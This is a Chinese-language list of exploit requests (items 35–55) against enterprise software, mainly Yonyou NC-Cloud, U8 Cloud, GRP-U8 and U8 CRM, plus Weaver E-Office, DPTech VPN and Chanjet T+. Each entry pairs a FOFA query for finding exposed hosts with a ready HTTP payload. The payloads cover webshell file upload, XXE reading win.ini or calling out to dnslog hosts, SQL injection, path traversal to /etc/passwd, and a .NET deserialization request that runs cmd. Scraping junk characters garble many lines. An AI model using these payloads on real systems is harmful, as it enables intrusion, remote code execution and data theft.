Accept: */*
8 _% M$ e. U/ H F" E* `Connection: keep-alive0 o$ D M3 @: a
- |# c$ ]7 ~ C% G: \/ _8 h
" s" m" l/ r3 B: k35. 用友NC-Cloud importhttpscer任意文件上传
6 [; G' \3 n4 n5 gFOFA:app="用友-NC-Cloud"
. h8 U+ D! q0 v4 U M( |8 g4 {POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1) C8 o4 L( |( H v" Y
Host: 203.25.218.166:8888/ ~- J( z2 x' G! H' a
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" h! f7 x$ l# t! x8 }; N
Accept-Encoding: gzip, deflate1 r) K- o3 g- z2 Z/ O1 [
Accept: */*+ O5 f1 c {2 u; c1 b
Connection: close, A1 C& a& Q1 w: w- O# |) x
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA. ^0 f% T/ |& ]) ` _2 J2 A1 k5 ~' X
Content-Length: 190
# B; m, V' w6 j( s/ i* CContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
. F0 S- f1 S' b7 R4 Q: _1 O& M- @1 m4 v: |' f! I" n: ?
--fd28cb44e829ed1c197ec3bc71748df05 z/ t9 a8 g+ U1 Q! y( m4 y$ r
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"; l7 s& I# b7 _
% V% }: Q( b+ b' s! B6 I
<%out.println(1111*1111);%>% I# r3 R! @$ v5 _5 r8 \. F
--fd28cb44e829ed1c197ec3bc71748df0--) K G! b3 p* T4 T) ]
: H# p8 z6 @, d
: V6 C3 T7 H3 e' ?% O" w4 b+ n* B
36. 用友NC-Cloud soapFormat XXE# m* }& w! y$ W7 Y4 Z$ E3 ]
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ B" y( h* g# }/ D: ]1 ~
POST /uapws/soapFormat.ajax HTTP/1.1. x$ t0 S/ D/ i {( B& l- g6 J9 \
Host: 192.168.40.130:89899 Z' G" B( h. q& ^) x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
9 q) p/ x4 c* ?$ yContent-Length: 263
, \0 h4 v0 m1 h' ?; }7 F9 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 G3 O0 c& c* @0 K( rAccept-Encoding: gzip, deflate
8 q( ^$ J) B5 w' s' x lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ e) B5 D; P1 g9 Z' t9 {Connection: close
# n; w. b; ?6 a6 `5 Q9 P& D- M1 G2 b. u8 zContent-Type: application/x-www-form-urlencoded
% z" t1 N7 D; ]: e. c @8 r; DUpgrade-Insecure-Requests: 1
! D" y e9 j# ^) ?, ?. _# _8 B8 o
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a' y7 W+ _# }* ]3 a8 C, m9 h- E& Z# e
; _3 v0 @. C5 U- x2 j$ j" Q; B
, N7 A& {8 H, n( a$ f37. 用友NC-Cloud IUpdateService XXE
4 e s/ h( L* vFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ k, U* ]/ l/ K# @POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.14 `# t2 v& o* J- ~( l( r
Host: 192.168.40.130:8989
/ i8 K' z. Q! V/ Q- lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
( ^9 t* v, s2 s3 A; Q3 o' UContent-Length: 421; A+ y8 z2 u* g: }9 m# Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, t; [" J1 z" t4 ]& rAccept-Encoding: gzip, deflate4 ^8 { w3 Z" T: e
Accept-Language: zh-CN,zh;q=0.93 }$ V, i2 ^- V% @1 X
Connection: close
7 D" W9 A* C5 N) u4 W. ?; f2 A2 eContent-Type: text/xml;charset=UTF-8
* a9 H* I3 n4 r) y$ A8 {' LSOAPAction: urn:getResult2 @, ^) [/ V* ~! P& ?7 G" a' d; p
Upgrade-Insecure-Requests: 15 D! a) \& @; c0 l3 ^5 w
J8 w& q; E+ h0 G3 j" N n+ f: Z' j
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
8 T' }5 U0 B% L$ V; q<soapenv:Header/>/ T$ u3 F a% P/ B+ P1 H( w( I
<soapenv:Body>
( h$ B+ _9 V3 G+ w5 K<iup:getResult>
/ l* G; z3 M7 N2 E<!--type: string-->
) l, u6 A: F$ F8 M<iup:string><![CDATA[9 f" P5 ]+ {: H
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>2 j2 t6 f) g3 J, N" h9 X8 Y
<xxx/>]]></iup:string>$ N& o9 l% U; W9 k! o6 R A
</iup:getResult>
9 R h) p7 l1 C8 o. }</soapenv:Body>% X! W! n3 x5 u, z, _
</soapenv:Envelope>
5 S* D- j" d% R! K% W+ H0 j2 K8 N# x5 S5 Z; J% u2 @) s
! }/ a5 _; K% J. _
0 f; s: H) H, c. d38. 用友U8 Cloud smartweb2.RPC.d XXE
5 ]9 p5 \5 _* ^8 H$ [FOFA:app="用友-U8-Cloud" `# \9 m( R6 D, O2 H! a2 D
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1/ C3 C& O9 x9 T& k0 n2 g# R% M- p
Host: 192.168.40.131:8088
T0 g; a/ a7 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
3 f5 r; z! U+ vContent-Length: 260
& p. \: `$ C) p/ oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3/ M5 U C" B3 ?7 E+ L' F
Accept-Encoding: gzip, deflate
5 Y G& t& C0 r7 \1 vAccept-Language: zh-CN,zh;q=0.9 ]1 U5 K1 D7 W$ g1 R
Connection: close% o# o3 S$ L# C- z: Z1 S" w
Content-Type: application/x-www-form-urlencoded8 p' F) y. D7 J8 X/ b0 N; I
; Z$ j- H$ S1 q9 g
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
" t/ P R7 J6 m7 W* ?) o0 \+ H( X2 p! |9 H: Z
; h b" J: z3 _7 M
39. 用友U8 Cloud RegisterServlet SQL注入( q# D! H! |% m9 ~% s% t
FOFA:title="u8c"5 O. E- P3 g( K
POST /servlet/RegisterServlet HTTP/1.1
6 |9 F3 l0 n" d+ G: _. V! pHost: 192.168.86.128:80896 V, _' n' [' ^/ j9 S8 }* n e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.361 q3 j7 c8 t& }' }! q! l
Connection: close
% X; w( Z/ H! M7 d& M$ dContent-Length: 85) Y: ]2 g5 e" w7 p0 |& k$ B/ W
Accept: */*3 m8 Y7 y9 G# J" B) G7 M5 K% F
Accept-Language: en! D/ X) x' b8 g% v" z+ q+ m5 p
Content-Type: application/x-www-form-urlencoded
9 R6 i, z* q; @/ a4 MX-Forwarded-For: 127.0.0.15 N" w; d9 i/ l+ k
Accept-Encoding: gzip
$ w* C8 g) @" l ~8 W( G+ ]8 k* g' K
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--! ^$ ?( p' a7 K. R5 ]
k8 @: {8 I' c- r* O1 g0 m" u* E6 D$ h$ R. D8 U
40. 用友U8-Cloud XChangeServlet XXE
+ ?8 T+ W9 Q8 K+ W0 k- @FOFA:app="用友-U8-Cloud"
+ |9 F3 m& W q- {POST /service/XChangeServlet HTTP/1.1
$ e+ _5 x2 U+ DHost: x.x.x.x p4 h5 F- I3 N8 |
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' M/ W! P8 G( F( O. Q( X
Content-Type: text/xml$ U/ b3 D5 \) k! g! G, n
Connection: close
K/ J* {- j2 s: @% t, B. b7 W- R) {6 P1 v
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
% R. I( x' K8 K7 r, h& J" Q6 @6 r' k. H) h0 l
8 ]* A: Z$ B `4 w( {* H c41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
/ i6 `9 f s- n$ U$ ^ d$ n4 J$ AFOFA:app="用友-U8-Cloud"
/ P/ `+ J) A# X9 eGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.15 U; I/ p m% y5 K, ^1 l2 L% }
Host:# J5 i9 j+ q# a4 x$ W% L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" ~/ [+ `9 o ~+ |8 |Content-Type: application/json
+ W- [( \* A# q: iAccept-Encoding: gzip) I! n# Y5 s- U) h8 _; A# ?( y
Connection: close
: V! H' y# S- o4 Y2 q
" E1 N+ s$ l8 h. u! u
4 n( I& O9 Q8 v4 P9 Q4 V' u( a42. 用友GRP-U8 SmartUpload01 文件上传2 | R* A( U# R
FOFA:app="用友-GRP-U8"7 w8 s2 W9 N+ K K
POST /u8qx/SmartUpload01.jsp HTTP/1.16 @ c0 Y) x* e5 @# Q1 s
Host: x.x.x.x
: S% o7 c& K: Q Q, w" r4 p6 \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
5 l" ]& p4 C+ f5 o) MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
' u5 |5 _" ?1 T
1 }: W: ?7 U: ~) l- p; M5 ^: a: BPAYLOAD1 V) ?: P# L9 h3 k) ~( Q
$ c% r# O( c* a+ z
, P- ^! Z( o% t1 P% l: A1 @http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml) K0 L* X/ A, _9 ~
4 z1 A" `( S9 O/ u/ K+ N5 F43. 用友GRP-U8 userInfoWeb SQL注入致RCE) \- }3 Q, I- H: a2 [
FOFA:app="用友-GRP-U8"
# o5 Q8 d4 Y: ^+ D+ t# j1 T* P% uPOST /services/userInfoWeb HTTP/1.10 ^; [4 i+ |2 H; E% J
Host: your-ip
/ R) q; s* X, R% l; l6 X3 E9 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 i% N2 |9 ?" v }0 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 e5 ~$ L! A, Z+ |" g2 [: e
Accept-Encoding: gzip, deflate
; E2 k! A$ f# ^& H/ u) \0 JAccept-Language: zh-CN,zh;q=0.9
; K) G0 v5 S, q2 N7 N: iConnection: close) ~$ g5 X2 L, S f1 D
SOAPAction:
$ d. ^6 t' n, ~$ t* k. lContent-Type: text/xml;charset=UTF-8
( D; b$ T' p8 k/ l" u) j7 |! q {" ~+ j$ V
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
0 D/ h( `, V8 M, K( `; ]/ P <soapenv:Header/>
" }# |, a6 j; r <soapenv:Body>* } W: r* E% i7 x3 P# S' I
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">" _( P! }6 s0 l! b# Y
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>9 y, a0 I* [: z# o( j, {
</ser:getUserNameById>
; U0 w( F8 ? S* \* Q </soapenv:Body>
3 e# b3 k; A* e& [9 _ J</soapenv:Envelope>
9 ~) r# a* k' y, f N
+ X+ w# o! w# C; V
6 R( d8 k9 M) m( y: m44. 用友GRP-U8 bx_dj_check.jsp SQL注入
! X' s b' V" j5 L' L( P/ {. ~FOFA:app="用友-GRP-U8"
+ y1 ^+ K+ l$ _$ Q0 y1 G7 }GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
/ @ u& C. I0 V/ q4 ~2 n5 FHost: your-ip
% ^# g% W. i) c0 c' JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
3 Q2 ~% I) J2 S+ \: hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: a+ V0 v3 ^8 ]Accept-Encoding: gzip, deflate
- G! m* O3 u. xAccept-Language: zh-CN,zh;q=0.9
8 @9 Y5 Z. [5 | WConnection: close
0 ~0 a! g# f5 q& m3 V/ P( Q3 Q5 V/ I" ?2 C, s( i
0 Z7 K' ]2 }4 l n45. 用友GRP-U8 ufgovbank XXE
2 Z1 R" v- i6 }1 SFOFA:app="用友-GRP-U8"
& @: X0 ]: i4 F, @9 BPOST /ufgovbank HTTP/1.12 y6 L- m; K8 X7 ?& v0 c) q
Host: 192.168.40.130:2221 s r% _$ j' E8 H3 y7 X" W5 Z2 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
" F) c+ y* G( WConnection: close
- j) ]; V. T) f0 R% q+ w' CContent-Length: 161
4 e& I/ X! h$ R4 \8 I: dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 s& u% d7 ~8 u) P( ~' F" fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 I0 g" {! r0 t# z0 P
Content-Type: application/x-www-form-urlencoded
; l* U- q1 `9 `2 g1 E9 {Accept-Encoding: gzip8 z# \6 Z! @# D$ m* N- v% k& w w
( f; p# _8 E) S; kreqData=<?xml version="1.0"?>( I% b/ N* [ y+ f9 P
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
: P8 ^3 ?; N% O9 L( s* Y2 I& m* l
6 b0 m. i9 b7 Y# D! i
H% ^6 z" L4 q, W( z5 ?3 ]46. 用友GRP-U8 sqcxIndex.jsp SQL注入/ q8 a. O" ]( u7 e) T
FOFA:app="用友-GRP-U8"
6 s$ W& e n4 u6 g5 TGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.15 J3 J) p U8 K
Host: your-ip2 p& ]3 c* ~1 U/ y, k. Y+ Q7 j/ V K, |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
! h2 u& J2 |5 H2 R, z8 x* HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" y: K" r0 j/ lAccept-Encoding: gzip, deflate: Z8 w: @8 s7 z+ Q" \ R
Accept-Language: zh-CN,zh;q=0.90 H1 _" C0 A' _* o
Connection: close
' v: m2 Z* m D/ [6 \5 G+ @
# Q' E" s- j, V, B5 a6 R$ {6 y5 l7 q3 e
47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 g. M+ f2 Q* ]8 m% P# V- s) [FOFA:body="/pf/portal/login/css/fonts/style.css"5 r! K1 [* n& u$ A0 q
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.10 ~4 H9 f$ ^, f' |$ ^+ v! O) y
Host: x.x.x.x( S% T0 @2 H. j& K1 p) @0 e+ o8 `
Cache-Control: max-age=0. R$ t p: w+ m! Z( ~! Y9 o+ s% K1 m
Upgrade-Insecure-Requests: 1
/ a, }7 x" c* MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 ]( |! ^5 m0 b/ P5 W4 T hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 @! M8 {: |( f& m9 }) z9 @Accept-Encoding: gzip, deflate, br/ n/ J( o+ A! D( I3 L/ w0 }
Accept-Language: zh-CN,zh;q=0.9 Q0 J9 c: W5 b
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT( v! q- d* [$ i, ~1 K1 g; w
Connection: close
5 U0 P- t( X3 g5 d: I" G/ a! @2 c. |! `! l' [- e# c3 A
, |3 d: A- S/ ]* p( P0 T: a$ p$ T9 I0 Y
48. 用友U8 CRM swfupload 任意文件上传
9 V [; i% N) o, [7 z# [3 `7 I7 ZFOFA:title="用友U8CRM"( K, K! C2 ]' E& S* L2 T
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
9 x, {8 i. q R6 DHost: your-ip/ S7 d: K! A+ \; S4 \* L; x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.01 F; |+ ^3 K# _4 K* ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ a: Q* s7 q7 t9 p" `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 c: B5 x" M( T7 G' bAccept-Encoding: gzip, deflate! z) Y$ R0 U. T- q2 X
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
9 a, |5 V. L5 f! L" |- _------269520967239406871642430066855$ x- j2 [; s6 a7 y/ c. `/ I3 `
Content-Disposition: form-data; name="file"; filename="s.php"1 b8 T" T9 |5 Z) R" J1 Z
1231( h3 C/ [& X: | ]0 c
Content-Type: application/octet-stream
' t& r+ k0 h" ~7 k; V& d, |------2695209672394068716424300668551 B0 C0 W1 X2 q
Content-Disposition: form-data; name="upload"- S4 w# G. r7 S6 D
upload
" x5 M: ^% n8 s2 k7 X------269520967239406871642430066855--2 z* V1 l) m4 {8 \0 V) ~
/ u0 H& v: {( S" c9 R+ N/ l) V' Z, [; w' x6 Y: H' J
49. 用友U8 CRM系统uploadfile.php接口任意文件上传# Y/ \8 c* ]" T5 H* z
FOFA:body="用友U8CRM"
' k& a9 \7 V% u& b3 a# E6 F: M$ n& A% u8 v6 b6 O
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
! q6 Q' G8 O2 T. O0 e+ bHost: x.x.x.x( N: z* f% D: g' }9 d1 ^) m/ o3 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* x4 o. H6 T3 u
Content-Length: 329' N$ t! A4 V# k4 r7 M- Y1 b- m+ @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# |- i) c1 u; S2 E0 H: [0 B2 [
Accept-Encoding: gzip, deflate! g$ Y. o/ u, |; p$ N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. R% ]- \2 a6 ], |- C* M4 r
Connection: close& J, P! i T, U- y
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
- j) U, X' W" O5 H0 W8 t
0 t( E% S: h5 p7 x1 D. v! d' c& U" A-----------------------------vvv3wdayqv3yppdxvn3w q% D1 @ _* {3 N3 }9 A
Content-Disposition: form-data; name="file"; filename="%s.php "
7 F7 p: k3 Z6 B! O! G4 _Content-Type: application/octet-stream
- o" F; \3 m x. p, Y0 j
4 E0 S, [6 Q4 _* Ywersqqmlumloqa
# I8 E$ |8 K' D5 h0 \5 ~: y6 j-----------------------------vvv3wdayqv3yppdxvn3w- G- a; s+ G& I5 M6 s6 T) z; h3 Y
Content-Disposition: form-data; name="upload"$ b R" \; G- Y( U0 ]
9 f$ ?9 m7 a1 Y( i* q# a& \+ r" l
upload
3 b3 T4 k- b" |/ ^! C7 ~# G-----------------------------vvv3wdayqv3yppdxvn3w-- n+ p8 F. V9 o+ B/ i+ G! o7 i% p4 B
8 s' R) S) Y! R2 d% r$ r1 Q* J j( s, C& H+ h
http://x.x.x.x/tmpfile/updB3CB.tmp.php( J6 G+ u9 A% J; F# n0 W
z) _7 Z4 N$ X7 _. l/ P
50. QDocs Smart School 6.4.1 filterRecords SQL注入0 X2 ~; `9 Y. S& @" ]2 |9 o0 N+ x
FOFA:body="close closebtnmodal"
$ d( Z% |: Y- ?9 m* XPOST /course/filterRecords/ HTTP/1.1
0 z5 E2 F2 D& n0 g- o oHost: x.x.x.x5 S3 {- O1 V$ E( b: G5 Q3 k2 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* [; h$ [; E) `! ?, |. q
Connection: close
7 Q) H8 V" ?% @" W& A: pContent-Length: 224
2 r8 W9 {7 L3 u. SAccept: */*7 J$ V; o9 F" N$ d6 F' i
Accept-Language: en
. ~$ y3 J! q% P. @1 J" D( I) AContent-Type: application/x-www-form-urlencoded* v' Y4 }- K4 i
Accept-Encoding: gzip
# ?9 t+ q5 J J9 [2 Y8 d+ i% ]# |. G z( C7 V. z, y/ \& A/ u8 V! f
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1" y! h. e t! U/ M* R0 g
3 W( H/ ^( p' \8 }) }4 ~5 `, O3 y9 N- n0 X: y/ \
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入9 E# G3 m" B0 S0 c' F% I/ G- R
FOFA:app="云时空社会化商业ERP系统"5 a# S. e: |7 Z, B7 d/ r
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1% y; }; `5 s, m" R- W3 R
Host: your-ip
7 a8 Y4 A1 a- Y* CUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
) ]# @7 m& }$ C+ JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' m Y0 B+ f9 s5 g; R6 FAccept-Encoding: gzip, deflate( |! G3 V, Z5 z8 D% |# X7 B
Accept-Language: zh-CN,zh;q=0.9
3 ]9 M! t! y3 G; W; F) K+ Z/ hConnection: close' l0 L9 n! M4 V9 ~$ S0 [8 L. H- `
' y# ^0 W F$ K' }* U: p# A: V T+ V* y2 H
52. 泛微E-Office json_common.php sql注入
1 f3 c" j3 i' O3 o6 p( fFOFA:app="泛微-EOffice"# y) F. @5 X' ?7 @4 x. \4 k: M
POST /building/json_common.php HTTP/1.1
* e/ h+ J8 Z% Y$ a+ eHost: 192.168.86.128:8097
% S0 L$ V' S2 T5 H7 y% ?User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% ^+ w. l7 I' |% FConnection: close. i9 ?' W' S2 @
Content-Length: 87
6 t/ X. j5 a9 R$ p4 E A7 \Accept: */*
O) I! e) _0 {$ C7 |Accept-Language: en- z) W1 R9 R& q, a( ~$ o& R+ b
Content-Type: application/x-www-form-urlencoded
, X# A2 X/ L1 y! V3 e6 B3 v7 jAccept-Encoding: gzip
6 r, V3 C! O! ~- ^, {3 m4 i7 m0 y9 G- E( ~: _
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
( r& s/ @/ m% a0 h" q5 ^5 k8 g# Y; U( o. _* B8 Q% [4 D9 ?2 ]8 r
& g* ]# G0 W; j1 P% ^' x
53. 迪普 DPTech VPN Service 任意文件上传6 t; \' V+ M- s; Q1 a/ S
FOFA:app="DPtech-SSLVPN"6 P/ Z$ \4 {2 O7 v
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
( i8 p6 a. A/ \' [) N2 i5 f/ J+ C
3 x+ v: h% x- n4 l
6 F# A+ k9 e& p5 a) Q/ g54. 畅捷通T+ getstorewarehousebystore 远程代码执行4 A! K) y" d1 j
FOFA:app="畅捷通-TPlus"
$ l! ~- h6 }( p6 y1 d第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
7 ^7 G$ J5 a \" I" g& q* Y5 t2 `"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"; @9 q! q8 {) A6 G
i4 [) k* I' B2 y" D3 X* o: `- }6 \0 J a8 ? T
完整数据包
: F+ ]6 u; I: `4 {* v' d/ WPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
9 d5 \( I3 M- pHost: x.x.x.x' F5 J% | q+ ]0 i3 S
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
0 G' y/ p& Q( l6 l9 l4 ~. J" H3 P: j; NContent-Length: 593
( ~% G5 R! ^( Z! }7 r0 L6 @9 k
a9 }6 H8 P! f3 Z9 J1 d% ]{
; |- h% {; C1 S* O }1 h"storeID":{ j. B9 K5 r( W0 a. @7 Q. F
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",2 \+ [, g8 a7 L( X; ]( W: m
"MethodName":"Start",% o1 x: `6 D% G" t# c! d
"ObjectInstance":{1 p$ x0 H- B1 u! F: w2 m
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",; b! P( N4 L# H3 {% h) q5 Y
"StartInfo":{
8 F3 D: \" O3 X: E7 Q1 ^ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. U( ] u) A8 A& S "FileName":"cmd",* x9 z7 B5 A, ^" w
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"- n" {+ h' w- Z. c- r
}
+ A2 {4 g4 l, E& u+ \ }9 x/ }* N R# @: D
}
: G5 Z9 h, m9 [) S: P}
9 G% B+ E: W0 H3 O2 e
! I5 X C( [. w/ \7 s" h7 O( T0 ^2 Q7 K& x' Z+ I
第二步,访问如下url
/ A% y% T0 i. W$ h0 H# K' X8 k5 O/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
; _6 t+ y: u; z0 Q( J' _
6 Q' i! a. b% u) } g+ L0 ~; Z
55. 畅捷通T+ getdecallusers信息泄露) x7 Q1 R% u5 H* ^3 s: j8 H U: b$ _/ N
FOFA:app="畅捷通-TPlus"9 ~/ G1 c# [" V# L* |6 C4 o
第一步,通过& S# G5 J! [6 r2 D- p
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie' W L5 u- |5 Q! z! ^0 O
第二步,利用获取到的Cookie请求$ g7 L; f; @4 M
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
8 s. \- N- f0 ~! {6 G
